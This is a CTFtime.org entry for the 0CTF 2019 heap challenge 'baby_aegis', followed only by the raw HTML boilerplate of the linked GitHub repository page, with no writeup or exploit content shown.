CTFtime.org

baby_aegis

by agadient / galhacktic trendsetters

Tags: asan heap pwn 

Rating: 5.0

<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system">
<head>
<meta charset="utf-8">
<link rel="dns-prefetch" href="https://github.githubassets.com">
<link rel="dns-prefetch" href="https://avatars.githubusercontent.com">
<link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com">
<link rel="dns-prefetch" href="https://user-images.githubusercontent.com/">
<link rel="preconnect" href="https://github.githubassets.com" crossorigin>
<link rel="preconnect" href="https://avatars.githubusercontent.com">

<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" />


<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" />
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" />
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" />
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />

<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>

<title>CTF/0ctf_2019/baby_aegis at master · agadient/CTF · GitHub</title>

<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">


<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">

<meta name="request-id" content="EB6F:1F9B:4EDF870:5107D45:64122514" data-pjax-transient="true"/><meta name="html-safe-nonce" content="b9f83334e5ac96029613f8c6e0f975eec78658f2851f1b958aa9e426d96fb7cb" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJFQjZGOjFGOUI6NEVERjg3MDo1MTA3RDQ1OjY0MTIyNTE0IiwidmlzaXRvcl9pZCI6IjIzMjg4ODY3Nzc0NTA5OTcwMTIiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="3367cb59f6d5d3078090ce039b2a910a0d8271f13bacfc591e80613af7e4d989" data-pjax-transient="true"/>

<meta name="hovercard-subject-tag" content="repository:167091212" data-turbo-transient>

<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />

<meta name="selected-link" value="repo_source" data-turbo-transient>

<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY">
<meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU">
<meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA">
<meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc">
<meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">

<meta name="octolytics-url" content="https://collector.github.com/github/collect" />

<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />

<meta name="user-login" content="">

<meta name="viewport" content="width=device-width">

<meta name="description" content="CTF writeups. Contribute to agadient/CTF development by creating an account on GitHub.">
<link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub">
<link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub">
<meta property="fb:app_id" content="1401488693436528">
<meta name="apple-itunes-app" content="app-id=1477376905" />
<meta name="twitter:image:src" content="https://opengraph.githubassets.com/a1bd14b8e2be9f0e450aa4e6857c3a7262faae5984cfb879fe83c6786145659e/agadient/CTF" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTF/0ctf_2019/baby_aegis at master · agadient/CTF" /><meta name="twitter:description" content="CTF writeups. Contribute to agadient/CTF development by creating an account on GitHub." />
<meta property="og:image" content="https://opengraph.githubassets.com/a1bd14b8e2be9f0e450aa4e6857c3a7262faae5984cfb879fe83c6786145659e/agadient/CTF" /><meta property="og:image:alt" content="CTF writeups. Contribute to agadient/CTF development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTF/0ctf_2019/baby_aegis at master · agadient/CTF" /><meta property="og:url" content="https://github.com/agadient/CTF" /><meta property="og:description" content="CTF writeups. Contribute to agadient/CTF development by creating an account on GitHub." />

<link rel="assets" href="https://github.githubassets.com/">

<meta name="hostname" content="github.com">

<meta name="expected-hostname" content="github.com">

<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">

<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload">
<meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload">
<meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload">
<meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">

<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">

<meta data-hydrostats="publish">

<meta name="go-import" content="github.com/agadient/CTF git https://github.com/agadient/CTF.git">

<meta name="octolytics-dimension-user_id" content="27151461" /><meta name="octolytics-dimension-user_login" content="agadient" /><meta name="octolytics-dimension-repository_id" content="167091212" /><meta name="octolytics-dimension-repository_nwo" content="agadient/CTF" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="167091212" /><meta name="octolytics-dimension-repository_network_root_nwo" content="agadient/CTF" />

<link rel="canonical" href="https://github.com/agadient/CTF/tree/master/0ctf_2019/baby_aegis" data-turbo-transient>
<meta name="turbo-body-classes" content="logged-out env-production page-responsive">

<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">

<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">

<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">

<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000">
<link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png">
<link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">

<meta name="theme-color" content="#1e2327">
<meta name="color-scheme" content="light dark" />

<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">

</head>

<body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">

<div class="position-relative js-header-wrapper ">
Skip to content
<span>
<span></span>
</span>

<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script>
<header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner">
<button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation">
<span>Toggle navigation</span>
</button>

<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1">
<div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto">

<svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github">
<path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path>
</svg>

<div class="flex-1">

Sign up

</div>

<div class="flex-1 flex-order-2 text-right">
<button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span>
<span><div class="HeaderMenu-toggle-bar rounded my-1"></div>
<div class="HeaderMenu-toggle-bar rounded my-1"></div>
<div class="HeaderMenu-toggle-bar rounded my-1"></div></span>
</span>
</button>
</div>
</div>

<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0">
<div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0">
<nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global">


</nav>

<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left">
<div class="d-lg-flex min-width-0 mb-2 mb-lg-0">

<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"
>
<div class="position-relative">
</option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="167091212" data-scoped-search-url="/agadient/CTF/search" data-owner-scoped-search-url="/users/agadient/search" data-unscoped-search-url="/search" data-turbo="false" action="/agadient/CTF/search" accept-charset="UTF-8" method="get">
<label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center">
<input type="text"
class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable"
data-hotkey=s,/
name="q"

placeholder="Search"
data-unscoped-placeholder="Search GitHub"
data-scoped-placeholder="Search"
autocapitalize="off"
role="combobox"
aria-haspopup="listbox"
aria-expanded="false"
aria-autocomplete="list"
aria-controls="jump-to-results"
aria-label="Search"
data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations"
spellcheck="false"
autocomplete="off"
>
<input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="twe46W3Qb5XWCSj6dGQjxsvpYGhDkPpAi/6NxXejzPAAdlXK3l4ocp8khwm/CBeQ1nnPYRa+eQGTn19fLl5Fmg==" />
<input type="hidden" class="js-site-search-type-field" name="type" >
<svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>

<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">



  • <span>No suggested jump to results</span>

</div>
</label>
</form> </div>
</div>

</div>

<div class="position-relative mr-lg-3 d-lg-inline-block">

Sign in

</div>


Sign up

</div>
</div>
</div>
</div>
</header>

</div>

<div id="start-of-content" class="show-on-focus"></div>

<div id="js-flash-container" data-turbo-replace>

<template class="js-flash-template">

<div class="flash flash-full {{ className }}">
<div class="px-2" >
<button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x">
<path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path>
</svg>
</button>
<div aria-atomic="true" role="alert" class="js-flash-alert">

<div>{{ message }}</div>

</div>
</div>
</div>
</template>
</div>


<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>

<div
class="application-main "
data-commit-hovercards-enabled
data-discussion-hovercards-enabled
data-issue-and-pr-hovercards-enabled
>
<div itemscope itemtype="http://schema.org/SoftwareSourceCode" class="">
<main id="js-repo-pjax-container" >


<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>

<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">

<div class="flex-auto min-width-0 width-fit mr-3">

<div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2">
<path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path>
</svg>

<span>
</span>
<span>/</span>

CTF

<span></span><span>Public</span>
</div>

</div>

</div>

<div id="responsive-meta-container" data-turbo-replace>
</div>

<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">


<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative">
<summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal">
<path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path>
</svg>
<span>More</span>
</div>
</summary>
<details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw">
</details-menu>
</details></div>
</nav>

</div>

<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class="">
<div id="repo-content-pjax-container" class="repository-content " >



<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4">
<div >

<div class="file-navigation mb-3 d-flex flex-items-start">

<div class="position-relative">
<details
class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 "
id="branch-select-menu"
data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":167091212,"originating_url":"https://github.com/agadient/CTF/tree/master/0ctf_2019/baby_aegis","user_id":null}}" data-hydro-click-hmac="b9f6066d661d452bcd468999bb37105ee8261523402a4974b5d23b7fad7b1b54">
<summary class="btn css-truncate"
data-hotkey="w"
title="Switch branches or tags">
<svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch">
<path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path>
</svg>
<span>master</span>
<span></span>
</summary>


<div class="SelectMenu">
<div class="SelectMenu-modal">
<header class="SelectMenu-header">
<span>Switch branches/tags</span>
<button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x">
<path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path>
</svg></button>
</header>

<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput">
<tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;">
<div class="SelectMenu-filter">
<input data-target="input-demux.source"
id="context-commitish-filter-field"
class="SelectMenu-input form-control"
aria-owns="ref-list-branches"
data-controls-ref-menu-id="ref-list-branches"
autofocus
autocomplete="off"
aria-label="Filter branches/tags"
placeholder="Filter branches/tags"
type="text"
>
</div>

<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" >
<button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button>
<button class="SelectMenu-tab" type="button" role="tab">Tags</button>
</div>

<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto">
<ref-selector
type="branch"
data-targets="input-demux.sinks"
data-action="
input-entered:ref-selector#inputEntered
tab-selected:ref-selector#tabSelected
focus-list:ref-selector#focusFirstListMember
"
query-endpoint="/agadient/CTF/refs"

cache-key="v0:1548205015.0"
current-committish="bWFzdGVy"
default-branch="bWFzdGVy"
name-with-owner="YWdhZGllbnQvQ1RG"
prefetch-on-mouseover
>

<template data-target="ref-selector.fetchFailedTemplate">
<div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div>
</template>

<template data-target="ref-selector.noMatchTemplate">
<div class="SelectMenu-message">Nothing to show</div>
</template>

<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame">
<div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading">
<svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
<circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" />
<path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" />
</svg>
</div>
</div>

<template data-target="ref-selector.itemTemplate">

<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check">
<path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path>
</svg>
<span>{{ refName }}</span>
<span>default</span>

</template>

<footer class="SelectMenu-footer">View all branches</footer>
</ref-selector>

</div>

<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto">
<ref-selector
type="tag"
data-action="
input-entered:ref-selector#inputEntered
tab-selected:ref-selector#tabSelected
focus-list:ref-selector#focusFirstListMember
"
data-targets="input-demux.sinks"
query-endpoint="/agadient/CTF/refs"
cache-key="v0:1548205015.0"
current-committish="bWFzdGVy"
default-branch="bWFzdGVy"
name-with-owner="YWdhZGllbnQvQ1RG"
>

<template data-target="ref-selector.fetchFailedTemplate">
<div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div>
</template>

<template data-target="ref-selector.noMatchTemplate">
<div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div>
</template>

<template data-target="ref-selector.itemTemplate">

<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check">
<path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path>
</svg>
